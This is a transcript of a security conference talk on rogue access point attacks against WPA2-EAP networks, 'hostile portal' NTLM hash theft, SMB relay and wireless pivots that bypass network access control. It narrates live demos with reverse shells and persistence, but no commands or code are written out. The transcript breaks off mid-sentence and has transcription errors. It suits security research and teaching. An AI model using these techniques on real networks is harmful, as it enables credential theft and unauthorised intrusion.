So, um, my name is Gabriel Ryan. I’m a security engineer at, let’s adjust this, OK. In the back, can you hear me? OK, good stuff. My name’s Gabriel Ryan. I’m a security engineer at Gotham Digital Science. Um, also known as Solstice. Uh, uh we primarily do like uh like Appsec, infrastructuring testing, red teaming, research, etcetera. Uh some new things in this presentation. Uh we’re going to be talking about hostile portal attacks that’s a method of stealing active directory credentials from uh WPA2-EAP networks without network access and we’re also going to be talking about indirect wireless pivots. Uh which is a way of using rogue WPA2 attacks to bypass uh port-based access control mechanisms by controlling the physical layer of the network. Uh, so before we move on into that stuff, a little background info.  Uh we’re going  to talk about WPA2-EAP and the vulnerabilities that affect them. Um, so historically uh WP PA2 EAP or at least the weaker forms of it has been susceptible to evil twin attacks or rogue access points in general actually. So, rogue  AP attacks uh you could consider them the bread and butter of the modern wireless pen tests. Uh you can use them for the stealthy man in the middle attacks, uh stealing radius credentials, uh all kinds of cool stuff. And the way that they work, I mean that the simplest form of rogue AP attack is the evil twin attack. The way that it works is that you have an access point um, like the one that we see here and then you ha..have a bunch of clients to it. So so let’s take a look at these four clients are connected to Def Con open on channel 6. Um, so if an attacker creates um an identical access point to this one uh, but with a with a stronger signal strength so uh a stronger signal strength but also has Def Con open channel 6 uh what will happen is this will cause the clients to drop their associations to the uh to the valid access point and then connect to uh the the rogue access point which you see down here and at this point the attacker has the man in the middle that that he or she can use uh to do all kinds of crazy stuff like, whoa, I almost dropped the shot glass. Um, heh heh, uh like stealing creds and and the attacks that we’re going to see today.  So. I mean, these are these are these are not new attacks.  They been around for a really long time. Um, you know, in fact uh the first the first mention I could find of them was in 2002 and uh this this wire wireless LAN Security FAQ by CW Klaus talks about evil twin attacks. Uh fast forward a bit, you have 2003 you have asleap by Joshua Wright.  2004 we start seeing karma attacks, we’re not really going to go into into those today, but uh if you don’t really know what they are check them out.  They’re pretty cool.  That was Dino Dai Zovi and Shane Macaulay. You know in 2008 you have Josh Wright and Brad Antoniewicz um uh comes out with uh you know attacks you know this is where you start to see attacks against WPA2-EAP uh using rogue AP attacks and that’s freeradius-wpe. 2014 uh, by that point, karma attacks had stopped working as well also so two researchers Dominic White and Ian de Villiers uh, came up with uh uh essentially fixed karma and then also added a bunch of uh cool techniques for adding E..uh attacking EAP which uh we are going to talk about.  And also in 2017 very, very recently you have the guy who wrote wifi fisher, um implemented the lure 10 attack which you can use against uh Windows 10 wifi attacks. So um what’s common, the the common theme here is that you know rogue AP attacks have been primarily used to fill one of two roles. Uh, stealing creds using man in the middle attacks or breaching WPA/WPA2 networks. Um in this talk we’re going to do something a little different.  We’re going to talk about uh using rogue AP attacks as a means of lateral movement.  So, uh, before we continue we should probably talk about you know about how you can use evil twin against WPA2-EAP and you know to do that we have to understand how the EAP or how the extensible authentication protocol works. So logically, and for those of you who are familiar with the EAP, I’m going to leave out that the the the authenticator for now uh just to make this um just to you know to address this you know from like a high level perspective first, but logically authentication in EAP um occurs between the supplicant and the authentication server. So the supplicant is just a fancy way of saying the wireless client and the authentication server’s the radius server and it’s sitting you know in the background. Uh you know deeper in the network. So the first thing that happens is the client’s authenticating a request to authenticating server.  At that point, the authentication server responds with with a X509 certificate and this X, the role this X509 certificate is to verify the identity of the authentication server and and and if the client, you know, accepts the certificate it’s saying that it it it trusts the authentication server and you know from that point forward uh we move from the outer authentication which is what we’re seeing here to this this what we’re seeing at the bottom of this diagram here and that’s the your inner authentication.  The inner authentication occurs through a secure tunnel that’s established at that point. Now the reason why we need this secure tunnel is that, you know, because it’s being used for although it’s being used as a authentication mechanism for WPA, that WPA does not actually kick in until this entire process is complete. So essentially, this is all happening over open wifi, so without that secured tunnel it’s established um this authentication process can be sniffed and in fact legacy implementations of EAP were were susceptible to thi..to this, specifically EAP MD5. Uh, so when I said there were 2 components to EAP authentication, I actually that wasn’t entirely accurate. Um, there’s a third component  involved as well and that’s the authenticator. The authenticator um, at least when we’re dealing with wireless is the access point and the job of the access point in in this case is to, um, act as an intermediary between the the wireless client and the authentication server. Uh, typically there’s like a wire connection between the access point and the authentication server and then all the communication layers happening over layer 7 radius and then on layer 2 we have we have the supplicant and the um the EAP...that’s and that’s communication over wireless. So at this point, you know, in order for this this uh uh this communication to eh, eh, to in order for this to work 2 things have to happen uh for this to be secure. You know the client has to be able to trust the authentication server and the client also has to be able to trust um uh the access point and you know as as we mentioned this is all happening over over open wifi and and as we also mentioned earlier, open wifi networks are susceptible to evil twin attacks.  So, likewise, this whole process um can actually be middled using evil twin attack.  You know what you do is create a rogue access attack or a rogue access point and that and you force the client to connect to you and at that point you run your own radius server in the background and so long as the client accepts your forged certificate your X509 certificate and and and by doing that is saying that it trusts you at that point it will establish a secure tunnel with you and then you can it will it will perform the authentication process with you and that allows you to uh crack the EAP challengers response off line uh giving you credentials. So this attack, uh first talked about by Brad Antoniewicz in 2008 as well as uh Joshua Wright in their SchmooCon presentation and uh it’s  been around for a while.  So for for the new stuff we’re going to do live demos, but just for the sake of time and also not p*****g off the demo gods if it’s just like review stuff I’m just going to stick to videos. Um, also just because it’s Sunday, but whatever. So ya..you know the first stage of the attack uh what’s going to happen what you’re seeing here is the attacker is is actually creating a a a forged certificate. Assault sign certificate and that’s what’s going to be sent to the client.  Fast forward it a bit and, you know, the attacker is starting the EAP. As you see here, uh the EAP is enabled and what’s going to happen shortly is that you’re going to get a client associating so see the client now is associating with the with the access point and shortly thereafter you should see, right there, we have the username challenge and response.  So, at this point you have the username challenge and response and you can at this point you crack it to obtain ee.. the  plain text credentials or um, the NT hash, which is uh equivalent to plain text credentials in terms of what you can use it for. So there two ways of doing this.  The the oldest way of doing it is with a dictionary attack and the success rate of this is inversely proportionate to the strength of the password. So say for a really strong password it’s going to be pre...it’s it’s actually like a a pretty bad attack. Um, you know in 2012  um Moxie Marl..Marlinspike and David Hulton, uh, you know they they actually uh,uh, did a talk where they did they um at at Def Con where they did a divide and conquer attack.  So MS-CHAPv2 which is which is uh the the um inner authentication protocol used by EAPP um actually uses the same 50 60 s encryption as NTLMv1 so the security of this protocol is actually reducible to the strength of a single DES encryption. So, instead of, you know, um with a dictionary attack we’re we’re trying to recover plaintext password for this you tend to sort of cover a NT hash and it actually with a with a um a powerful FPGA cracking rig such as crack dot s h, um, which you can go look up.  It  is pretty cool.  Um, which is pr..previously per Cloudcracker.  You actually can achieve a 100 percent success rate in less than 24 hours for recovering NT hash. So as you can see it’s it’s it’s pretty vulnerable so the solution that was introduced to kind of mitigate this issue was EAP-TLS and this was introduced in 2008. Um probably in response to uh, the attacks that came out around the same time period and and the cool thing about EAP-TLS is that it uses mutual authentication using x509 certificates right off the bat.  So, the strength lies in the in the use of the client-side certificates. Uh,it because you know with those you can can’t really do the evil twin attacks that we that we that we showed you in the beginning.  Um, unfortunately, how many  network admins are out there right now? Show of hands. Alright, so how many how many how many people out there, you know think that that putting the client-side or client cert on every device of your network is like a good time? Ye..yea yea so, I mean this is why it never really took off because it it’s like, oh yea I just put I just put a uh cert on everything and and it’s actually  not that simple and you know it’s and it’s even more difficult if you have like existing network infrastructure to integrate this stuff into to or if you’re in in like uh uh special scenario like you know you’re dealing with you know industrial control systems or or medical equipment or something like that uh it might not even support client um client based certificates. So you know you run into this classic security versus convenience scenario. And you know it’s it’s kind of, you know network administrators are forced to choose between uh uh two really kind of like poor choices.  You know authentication mechanisms with known weaknesses or you  can use the EAP-TLS which is highly secure, but it’s also very um very impractical. So what this does is it actually creates a market gap and you know there there are all kinds of products that have tried to address this over the years uh and and tried to compensate for this security issues found in EAP-PEAP/EAP TTLS but are also kind of easy to use.  So the current trend that that the you know we tend to see over and over and over again um, is is the focus on breach containment, rather than breach prevention.  So the idea is you acknowledge that um, yes, the wireless in the the wireless perimeter is is weak um but you you try to you know stop the the threat once it gets in that inner layer of that that first layer of defense. So, we’re going to talk about this, uh today is whether or not this actually works. So um I I guess the the most common way of approaching this containment problem is using uh uh network access control mechanism uh to attempt to stop threats uh as a as they occur.  So before that, I am going to present you with this this awesome little cartoon. [silence] Yeah. OK, so um, so yeah, the most common way uh that this this is implemented is is to use a NAC to to um, once once an attacker gets on the network uh you identify them as an untrusted endpoint and you quarantine them.  You either, you know, completely block the port or you or you you place them in a a quarantined VLAN and um you know and and you know there are two varieties of NAC out there.  There’s an agent-based NAC and a agentless NAC. And a agent-based NAC you know what that involves is it’s a software component installed on on on every authorized endpoint of the network and these these uh and and this software component is called an agent.  And this agent communicates with the brain of the NAC and uh and and and that’s how the brain of the NAC distinguishes it will tell that a particular endpoint is is allowed to be there. And this is this is highly effective, but once again you have something you have to put on every authorized endpoint so it’s nearly as impractical as the EAP-TLS. So then on the other side of the spectrum you have you have have agentless NACs. And uh agentless NACs they use the they’re purely external. Uh they use passive fingerprint fingerprinting, active scanning and they’re much easier to deploy than agent-based NACs, uh but unfortunately they’re also unable to examine the internals of the network components so you can bypass them simply by masquerading as a valid uh host on the network.  So once again you know you’ve you’ve even by using NAC we run into uh the same recurring dilemma which is, you know, insecurity versus impracticality. So  this creates yet another market gap, you know, where you have a high demand for a solution that offers a deep interrogation capabilities of an agent-based NAC, but without the additional overhead. So you know there’s a third gr..category that are all kinds of uh really interesting solutions that that have once again tried to tried to bridge this gap.  Uh and and we usually refer to those as the next generation gap uh NACs. You have um kind of like AI based solutions that kind of you know establish a baseline on the network and try to figure out look for anomalies, uh you have, we’re going to talk about  one in particular just because uh it’s a pretty good example of uh uh a interesting attempt at doing at doing this.  Uh, I tried to borrow this particular network appliance, uh from from my IT department I opened up a help desk ticket.  It’s a 10,000 dollar piece of equipment though, and uh yeah, I could have seen that coming, right? But interestingly enough, I also got like a warning from legal not to to name drop this people so we’re going to refer to this as vendor A. Um, heh, but you know this this one really interesting uh piece of equipment, it uses WMI to interrogate new devices.  And uh you know this is really cool because you can it’s capable of performing internal checks without using an agent.  Um, with that said, I mean, it the way it does this is that it authenticates over SMB using a single administrative service account.  The service account you know is given remote login privileges to all authorized devices at the group policy level um and and and the and this allows it to perform deep interrogations without using an agent. Pretty cool, except that it also provides a single point of failure where you have this device that’s sending godmode hashes to every new device that’s added to the network. So, you know, um wh...you know, what what this what happens here is we end up with a situation where the the the first potential threat here is it introduces the risk of SMB relay attacks. Um, in case you’re unfamiliar NTLM is is  a simple authentication protocol. Um, the way that it works is that you know the client first attempts to authenticate with with the server.  The server issues a plain text uh string of characters as a challenge to the client.  The client then has to encrypt that string of characters using its password hash and then send the encrypted hash  back to the server as a response. The server then decrypts it and compares it to the original string that it sent and it does the same authentication attempts succeeds. So with an SMB relay attack you literally just put yourself in the middle of that process um using a man in the middle attack the victim sends you the the the the authentication request.  You forward that to the target. Uh, the target then it sends you the plain text string the challenge.  You forward that to the victim and, oops, and you keep forwarding stuff back and forth and so what ends up happening is your you end up authenticating with the target instead of the victim. So you know once gain we have we have the system but you know we we’ve introduced the risk of SMB relay attacks um because you know it it’s sending you NTLM hashes and trying to authenticate with you over NTLM. Um, but at the same time uh you you could mitigate this potentially by using uh um SMB signing which which interestingly enough it’s actually disabled by default.  Everything but the domain controller um in in in Windows.  So, um and the reason for this is that the main controller uh downloads group policy over SMB. Um, but even if you enable SMB signing, which its its what you do with SMB signing is you digitally sign packets uh to confirm their authenticity. Um even if you enable SMB signing you still uh the issue of hashes being sent directly to untrusted endpoints. So, um interestingly enough there is like uh a piece of software that you can put on every single network endpoint uh that’s provided by this vendor but uh essentially then you’re back to using an agent again so you’re kind of back to square one.  So, I mean, I I guess the the point I’m trying to make is that you know, no matter how much thought into this, there’s really no magic bullet here. I mean your you have this security with convenience um uh statement but the problem is security with convenience  is actually a paradox. So, back to wireless. Um another another technology that that’s often used as a wireless security mechanism that that’s worth looking at is is is client isolation. So the way that um the the what client isolation is suppose to do it’s suppose to prevent wireless clients from from talking to one another on the network.  And you know a couple of use cases on open network. If you go onto your hotel wifi you may notice you can’t ping one another.  That’s because they probably have client isolation, um, enabled. And you know the way that um it 802 11 is suppose to work in theory is that the AP um mediates all communication between the the clients. So if this guy here wants to send a package to this guy over here, the client can just stop it and say no you can’t do that. Um, the problem is the client isolation ii..at least on on a wireless network is a logical control, it is not a physical control. So you know the problem is how do you prevent radio transceivers from communicating with one another? So a really awesome researcher who unfortunately is no longer with us named Cedric Blancher. Uh back in 2005 his response to this is you can. He released a tool called a Wifitap. Uh, and and this was like revived in 2013 by Oliver Lavery of Gotham Digital Science. Way before my time. Um, but the way that Wifitap  is that it reads packets from the victim to AP using a wifi interface in in monitor mode. And then you know every time it receives one of those packets it’s going out to the distribution system it injects a response as if it’s coming from the AP. So this allows it to actually um communicate with the um with the variable sources on the network without actually being associated with the network at all. And it provides a neat little tun tap device that you can use to to to bridge over to the uh, uh to to the monitor mode interface that do this. So, I mean there are some later tools that that let you do even more stuff.  Aircrack suite has airtum-ng which you can do this with web. And there’s also tkiptun-ng which you can do this with WPA1. Um, there’s also this this uh theoretical attack uh has been talked about called hole 196 where uh I I I guess the idea is that pro..you might be able to do this WP2. It’s really, really really debatable whether this actually works. I’ve never seen it pulled off before. Uh, but it’s worth mentioning just to be thorough. So, uh, here’s an example of of of Wifitap doing it’s thing. In the top right we uh have a we’re going to create a a valid a an open access point and then we’re going to connect to this open access point from our host operating system.  This this terminal is just been changed into a VM by the way. And then we’re going to start sending the uh sending sending ICMP packets uh, to this AP and what you’re going to notice is we’re going to have 5 ICMP packets sent and they’re going to be 5 responses. So now what we’re going to do is we’re going to in in this terminal to the left we’re going to start a wifi ping and a wifi ping is a modified version of Wifitap that um essentially all it does is that everytime it sees an ICMP packet and and sniffs one, it injects a response in that ICMP packet in in the form of an ICMP reply. So we’re going to run that as well and repeat the what we did in the last process. Uh, sending 5 ICMP packets and notice now instead of receiving 5 ICMP replies, we receive 10 of them. And we also get little warnings that we’re receiving duplicates. So, what we’ve just done is we sent packets to um uh uh uh network endpoint without actually being  associated with that network. So, you know, food for thought, you know going back to the whole issue of NAC, right?  You know, what if we’re missing the point? You know wh..what we have been talking to up to this point is is whether or not you know NACs are capable of of of stopping a direct attack.  But, you know, when we’re talking about wireless NAC isn’t the only problem. Um, you know the role of NAC is to prevent attackers from accessing sensitive resources after the breach has occurred. Um, you know, and they did this by by when unauthorized endpoint has been detected, uh, they take one of two actions. Either the endpoint is placed in quarantine or the port is blocked.  But you know, violating access control policies uh what this does is it causes the NAC to impose a  restriction and in a wired, this is a physical restriction, but in a wireless network this can only  be a logical restriction. More on this later. So, I want you to think of a scenario that that that’s pretty common in in in in you know if you’re doing pen testing or or anything that’s still kind of a infrastructure testing. So, um you know we’ve already breached the perimeter using the attack that we we described in the first section of the of the of this talk. And this is also where over on the left where we we’ve been quarantined and we want to get over here.  We want to pivot further into the network where we ca..can actually do some damage.  Uh, unfortunately we’ve been quarantined by this NAC  here, but fortunately for us there’s this victim over here that we can potentially do something with. And and and also is a wireless client. So, more on that later. Uh, but the question is how do we get out of this situation? So, I mean to understand this um we need to look at something called LLMNR/NBT-NS poisoning. Um, and and LLMNR/NBT-NS S it it basically takes advantage of a flaw with that exists within netbios name resolution.  Um, so the way netbios resolution works is that uh, the first thing that will happen is that a Windows host when it is trying to resolve a netbio signal it will check internally its local cache and also its LMHosts file.  If that fails um it will then attempt to attempt DNS resolution using local nameservers. Uh and then at that point um if that fails as well it will fall back to LLMNR and then NBT-NS uh and and send broadcast requests to the entire subnet. So uh, LLMNR/NBT-NS they’re actually different mechanisms, but they serve the same logical functionality.  And this is best understood through example. Let’s say we have two computers named Alice and Leeroy. Alice wants to request a file from Leeroy but doesn’t know Leeroy’s IP, all all Alice knows is is Leeroy’s netbios name. So Alice will attempt to resolve Leeroy’s name locally in using DN..locally and also using local DNS, but let’s say this attempt fails. Alice will then make a broadcast request using LLMNR/NBT-NS. At this point every single computer on Alice’s subnet will receive this request and the idea here is that only Leeroy should respond to this, but this is based on on honor system. Does anyone see a problem with this yet? Yeah, yeah, so I mean it’s a lot like art where you know there is no honor among thieves. If Alice receives two of these responses, only the first one is going to be considered valid and this is going to create a race condition. The attacker can simply wait  for LLMNR/NBT-NS queries and respond to all of them. And this will cause um the victims of this attack to send their traffic to the attacker. So there’s uh the the most co...I guess like the most popular tool for doing this, and really pioneer in doing this was um uh responder by Lawrence Joffy or Lawrence Jewish I should say. And we’re going  we’re going to start this up on the left and we’re going to run this. Uh you can see here that we’re poisoning LLMNR/NBT-NS and we’re also have off servers that are waiting for us when this thing tries to connect to us and authenticate. So we’re running responder and then we’re going do over here on the right we have a victim computer, uh, named Jenkins.  We attacked Leeroy earlier. Um, n..heh. So, Jenkins is going to try to connect to um.. He’s going to try to connect to to a non existent uh file server. And the reason why we’re using a hostname that is invalid is because it will force Jenkins to fall back to LLMNR/NBT-NS because it obviously won’t be resolvable using the first three methods. And then when this happens, um the responder told it running on the left is going to poison those uh send poison answers to Jenkins. And oh we have the user task right there. So we’re about uh 5 percent you know finished with our escape attempt. Um, I’m just going to check the time really fast. OK we’re doing great. Awesome.  So um the next thing we need to go over in order to understand how we can get out of this is something called redirect to SMB. Now the idea behind redirect to SMB is that you force the victim to visit an HTTP endpoint that redirects to an SMB share in the attacker’s machine so you send them a URL.  They click the URL and this takes them to a specially configured HTTP server and the on..only thing that the HTTP server does is one thing and one thing only and it redirects all the HTTP requests to a rogue SMB server that’s sitting there um waiting to accept um uh  NTLM authentication. And what this does is it causes the victim’s browser to attempt NTLM authentication with the attacker. Uh, there’s a variation of this uh call...you know where where where you simple redirect to a non-existent SMB share and this triggers LLMNR/NBT-NS. But it’s a really fast way to get hashes. It does require social engineering though.For some way of getting access to that that that server. So, um, now is where we get into new stuff. And it looks like we have lots of time to go over it too so. Demogods will probably be somewhat happy about this. Um, so, now we’re going to talk about hostile portal attacks. So the hostile portal attack  it’s a way of stealing active active dire..directory credentials from a wireless network without direct network access. And the way that you do this is is you essentially make a modified captive portal. So a captive portal.. How many of you have seen something like this recently? Yeah, ya so if you’re staying at a hotel you run into this this captive portal and the idea here is that you restrict wi...wifi access by um forcing the users to to visit this page first and you know at that point you can do anything you want it it’s most commonly used to uh uh you you either prompt it to authenticate or or or provide credit card information or something like that. So the way this works is that um all DNS queries are resolved to the captive portal. You know and and and this usually specializes in HTTP option, but also in case they are manually saying the victims mail is saying their their DNS server uh, you can also redirect DNS traffic to your own DNS servers so that they’re forced to use yours. And then if you really want to be nasty you just redirect HTTP traffic to to your uh captive portal as well so that even if they’re not using DNS um at all, uh you you still have them trapped. Uh so what a hostile portal attack is that you kind of modify this so that if performs redirect to SMB attack. Uh, the victim’s forced to connect to the attacker using the rogue AP attack.  Kinda like that, right? And the next thing that happens is that you instead of redirecting everything to a captive portal you perform a redirect test SMB and and what happens is that the victim is then forced to um, if if they’re if they’re using HTTP traffic at all they will be forced to authenticate with the attacker and that gives you NTLM creds. So um, and and and and in the background also to make this more effective uh we can run a responder to poison LLMNR/NBT-NS uh re..request so that even if they’re just kind of idle we can still get them that way. So now, now we’re going to do a live demo. So, I am going to I have to switch screens here. Alright, so in the bottom left here we’re going to create, um.. We’re going to do this on the open access point first because there’s another couple steps we have to do to get this to work with a um a not so open acces point uh, uh WPA2 EAP access point. Well, it’s not on the screen.  Uh, oh. Alright, do you see one thing now? Alright, I’m just going to ...  It’s still not on the screen. Oh, whatever.  OK. I’m going to just use the video then. Uh cause, just one second, oh. I have 35 minutes. Here check this out. Isn’t that a fun. Uh Do I have a command but..this is a Mac so I’m not sure. Alright, can you can you see stuff now? Alright, cool. Nothing like system prefe..preferences to the the rescue. Thanks Steve Jobs. Um, so so if your Mac breaks you just you just pray to Steve Jobs and then everything works again. Except now my stuff’s on two different desktops because I tried to fix it that way. Alright. That’s the first desktop. And I’m going to put a 2 minute curfew on this DMU demo or a 1 minute curfew on this demo should I say?   Aaah I’ll go 2 and if I  if I encounter 2 minutes worth of problems just so we can squeeze everything in, I’m going to just move on.  But hopefully, the way things are going. Uh, you know knock on wood. [tap, tap] OK this shouldn’t, this should work. Alright so the first thing I’m going to do is I’m going to create a...so these are backwards... that moves here..OK so we’ve we’ve created the open access point. This is not looking like an open access point.  Alright so so so we’ve tried to create an access open access point. Now we’re we’re we’re uh we’re killing the peep..uh..OK. Alright here we go.  So we’re going to create an open access point uh using eap hammer we’re actually going to use the same attack uh attack tool that we used for um  for attacking this thing to create our valid access point. Uh, cause why not. Now we’re going to have Leeroy up here in in the top left. Um, can you guys see this? OK, good stuff. And OK it looks like we’re already connected. Excellant. Uh we’re now going to create our rogue access point over here. Uh and this we’re going to launch this attack and then we’re going to get ready to deauthenticate uh Leeroy to get it to roam from one DNS sight to another, which will make this attack effective with all these network interfaces really close together. So we’re doing this. And OK so we got it to associate. And notice that when we open up IE, OK now we have hashes. Now to get everything… Now to get everything to stop. OK. There we go. Cool stuff.  So that that that’s a hostile portal attack against a open network. It’s so impressive we’re going to make it a little more impressive.  We’re going to use it against WPA2 in a second.  Once I clear this uh previous  hash that we just captured, so we get it twice...Alright…. Oh, really, OK. It’s I feel like we’ve been here before for some reason...OK..Magic.  OK, so uh, OK so now let’s talk about how to do this with WPA-EAP networks. So in most cases uh WPA-EAP means EAP-TTLS or EAP-PEAP. Both of these use MS-CHAPv2 as the inner authentication protocol. Interesting thing about MS-CHAPv2 it uses a mutual authentication which means at the very end  of the authentication uh process the radius servers must actually do pru..acknowledge of uh the user’s password to the client uh for the entire authentication process to succeed. So what this means is that although the attacker can force the victim to authenticate with an evil um evil twin uh to steal the hashes, uh the the radius server will still fail the final stage of the authentication process and the client will not associate with the attacker. So the way that you get around this, because you do need to, in order to get around the hostile portal attack you need you do to get it to completely associate with you.  There are a couple of options. So for for weak radius passwords uh, you can use a technique uh that uh Dom White and Ian de Villiers came out with in in Def Con 22 called auto crack ‘n add and we’ll talk about that in a second. And the second solution we can use um is simply the crock..crack crack from offline and finish the attack later. Um so uh the the way the the at the very end of the uh MS-CHAPv2 authentication process, uh the big thing here is going to send the challenger’s response which is part of what we’re cracking um offline to obtain the credentials uh, to uh the uh radius server. Which in this case uh with with the tools that we’re using for the attack is hostAPD. Um, at that point the hosting ADP is going to load uh the password from this file called the EAP user file which is just like uh, especially uh it’s like a special text file that uses a database that contains that information.  So, you know at that point um the the the attacker or the the radius server in this case is going to attempt uh  to construct uh authentication response that proves knowledge of users password.  And then that will be sent with the au..auth success message back to the victim. So when you when you’re using auto crack ‘n add technique uh what you’re doing is instead of um immediately loading that password  from the EAP user file uh, you you you instead take the challenger’s response and send it to a cracking rig.  And this can be like our remote cracking where it’s very powerful.  It doesn’t have to be something that is on your laptop. And then you you you send that off and then you know the idea is that hopefully uh you will get the the results of that back in time where you can actually just append it to that user file in real time and then use that to construct the authentication response.  You know, thi..this may not work the first time, but you know the idea is that maybe like in a few seconds or even a few minutes when the the victim tries to reassociate um that this will work and the full association will will will happen. Um, and the second option, of course, uh for for all those other passwords, uh uh is simply to crack offline and and and finish it later. Um, you know without even going into discussion that you know advance persistance threats like this guy on the right um you know are really limited by time boxing uh remember that we talked about how the divide and conquer technique uh with with with sufficiently powerful hardware uh can crack MS-CHAPv2 uh within 24 hours within a 100 percent success rate.  So you can just you can just go with that and just you know do the cracking and then then uh come back the next day and do it. So for for demo purposes, I’m obviously not going to connect to the Def Con wifi and and send stuff over there, so we’re going to go with the first option. Alright, so here we are this is uh very similar .. Can you guys see the uh..OK yeah, I can see that so so that’s working. So we’re going to first create a PEAP access this time using WPA2 P E A P.. and this this uh wireless client here Leeroy’s going to attempt to connect to it. And it did.  OK. So we have the a connection. Now we’re going to start our rogue.. And actually  before I do that, I’m going to go in here  and actually because I did I did this earlier to practice and the credentials are already there. So I’m going to get rid of them. OK. Now we’re going to do  a local autocrack. So we’re just going to do this internally. And finally to get this  thing to roam, the off hash before. Hopefully this works. Uh oh. Alright, so what are we running here? No?! OK It emptied off into the wrong thing. That would be bad. What.. no it’s still connected to that uh so OK. Uh, authenticated. I’m actually just going to copy. I’m uh and going to paste this uh this Mac address from from here and see if I can see if I can try it again. Alright, try number 2. Oh, you know what this is? You see how I’m clicking this uh, this thing right here um over and over again and it’s not bringing up the network manager? That’s because I’m using a virtual machine and the virtual interface has has cooked itself and is not doing a thing.  But luckily I came prepared because uh I’ve seem to be on the Demogod’s bad side recently. So. We’ll just, we’ll just go at that route. OK, so back to where we were. Um in the top right uh we have the legitimate access point. Now we’re going to create a wifi network called example wifi.  It’s going to be a PEAP network. And the bottom right we’re going to have Jenkins this time. And Jenkins is going to attempt to uh uh as..authenticate with this. And this is a valid access point so we’re just going to go ahead and connect them. And then the left hand of the side of the uh screen here, uh this is where our we’re going to launch the rogue access point attack.  So we’re going to create that. We’ve created the rogue AP and started it.  And then on, in in this tab right here, we’re uh going to perform the alpha attack to get it to roam over to us. Uh sometimes what happens with.. Oh, wait tha..Yeah, so sometimes what happens here  right is that when uh uh certain clients uh they’ll actually just you know pop off uh the network completely, but then then when they try to reassociate, they’ll end up on the rogue AP. So, a little user inconvenience there, but we don’t really care about them anyways. Uh so we see here that we’ve captured the credentials. Uh they they’ve been written to the end of the um.. And now they’ve been written to the end or the um the end of the uh EPA user file that’s we’re just going to just capture the contents of that file really fast. Here we go.  It’s to the end.  They’ve been added. So now we’re going to repeat the attack. And notice that when we do that.. Go ahead and accept that that cert warning is popping up. So we do that.  Um interesting things sometimes  for some reason when you connect to a network uh you you IE just manages to open itself. Uh, by itself.  And of course when that happens you’re going to send HTTP traffic and you get hashes.  And also check check this out.  This is going to be pretty cool.  Um every time you type in a character in the IE address bar, it tries to do a Bing search. So we’re doing this and it’s making each HTTP request so that every time you’re typing in a character we’re just getting a hash over and over and over again. In fact it looks like the E panel over here is starting to complain that we’re doing it so often. Um and then over also IE is like what what’s going on? We can’t request anything. So yeah, that’s a hostile portal attack against WPA2-PEAP. And what this gets you is lots and lots of NTLM hashes. You get similar results to LLMNR/NBT-NS poisoning, uh but there are a few key advantages here. Uh, no direct network access required and you’re not limited to a local subnet. You get everything that is connected to wireless. And it’s also not a passive attack.  You’re not waiting for LLMNR to show up on the subnet… on your local subnet. Uh, you’re actually forcing things to happen. So back to our scenario. Here we are. Um, we’re going we’re going to do a new technique that that builds off a hostile portal attack and it’s a technique for using a rogue AP attack to bypass port-based access control mechanisms. Um, so here we are with the attacker.  We’re back on this quarantine VLAN and we’re actually going to do our escape attempt now. Once again we’ve been quarantined here by the NAC and um, over here we have the victim that’s been placed in the restricted VLAN. You know and and obviously you want to get over here and access the sensitive resources. So what if we first, um, let’s say that we have  uh one network that after that’s being after it’s being used to activate this VLAN, what if we first take a second network adapter and then force this this victim to connect with that second network network adapter using the evil twin attack? Well, at that point  the the victim is uh you know we we take them off the restricted uh the network that we’re attacking and we force them to associate with us.  We then attack them using a ho..a hostile portal attack to obtain their NTLM hashes. Crack the hashes offline. Come back later.  Pick up where we left off. We might have to repeat the first step to make this work, but at that point we can we can place a  timed payload on the victim, right? Uh, like a scheduled task or something. At that point we we we kill our our rogue AP our rogue AP that’s operating in our second network interface.  We allow the victim to reassociate uh with the target network. The NAC moves the victim back to the restricted VLAN because it’s not authorized at that point. At that point we just wait for the reverse schel and this can be the best Mac in the world and it would not even matter. So um that was cool, but it requires some offline cracking of NTLM. Uh we obviously don’t want to do that. Uh, well, I mean it it will work but it would be cooler if we could we could speed that process up a bit. So to do this we can use SMB relay attack. Um, and we talked about this earlier. So with an SMB relay attack, uh, what we’re going to do is we’re going to we’re going to first uh u..use the rogue AP attack as before to force the victims to associate with our with our hostile portal and then when that happens uh, we then initiate the hostile portal attack but instead of just capturing uh those those NTLM hashes, we instead um, er, eh, perform a SMB relay attack to obtain uh uh uh schel on one of these victims.  And we use we use that schel to place a time victim uh, time payload on that victim. So that that happens much more instantaneously you don’t have to to crack those NTLM hashes offline. At this point we uh we kill our rogue AP as before. This allows the victim to reassociate with target network. Wait for the reverse schel and we’ve bypassed the NAC. Uh and as I said my USB interface is dead. So.. I have a back up. Hmhm. So here um.. Show of hands, how many people have used empire before? Alright, cool.  For those of you who haven’t, check it out.  It’s really easy to use and it’s it’s really really fun.  And actually has a module it’s called trolls..trolls ploit which you can use to like you know just re your um your victims, um er send little prompts that say stuff like you’ve been disconnected from the domain controller.  Just all kinds of funny stuff. So we’re going to connect these these two uh these two VMs these two victim VMs.  We’re going to use two them at a time. Uh, two art are uh are legitimate access point over here in the bottom left. On the right here we’re setting up uh empire to perform this attack.  We’re going to create two listeners. That’s what our victims are going to connect back to. We’ve also created uh uh payload and this this big blob of of 802 dot 1X  that’s a power command that’s going to give us our reverse schel and we’re going  to tell our SMB relay uh script, so we’re using SMB relay X although you can use anything for this really.  Um to execute that on a target machine. We then lodge the  rogue AP attack. And as before, once the rogue AP is running, we use replay to uh uh force these devices to associate with us. There by authenticating them to roam over to us. And  you can see that happening here. Alright.  So we have one associated.  We’re going to have to force the other on to associate as well. Sorry, I repeat that. And it’s waiting for beacon frames so I’m going to fast forward through that. So, we’ve um, we’ve we’ve got the second victim. The second victim is now going to roam over to us. And you can see that there’s some  bad th..thought the IE  weirdness happening in the background when you first connect. Um, but now we’re going to take a payload and we’re also going to grab the IP address of one of these victims and then feed it to our SMB relay script. So we’re just going to copy and paste that over to our SMB relay script. Which we’ve done here.  Now we’re going to start it.  At this point we’re going to generate some HTTP traffic um on one of these machines uh just to make sure the SMB relay attack happens. So we’re doing that here. And notice there that you see a lot of activity from the SMB relay terminal and then that’s why that’s because it’s just the attack’s actually executing. And now we just wait for the reversal there was a 45 second delay on the on on the payload. Uh so you’re just going to have to, I’m going to kind of skip a little bit, but I want to see you guys.. I want you guys to see the other connecting. There it is! That green text.  That’s our that’s our initial payload. So now what the scenario that we have is that we have two um two devices that are associated with our rogue access point attack and we’ve used SMB relay to uh gain a schel on one. So now that we’ve pivoted into one of them, uh, we’re going to use the persistence module uh from empire.  Uh for for illustrator purposes schedule tasks work 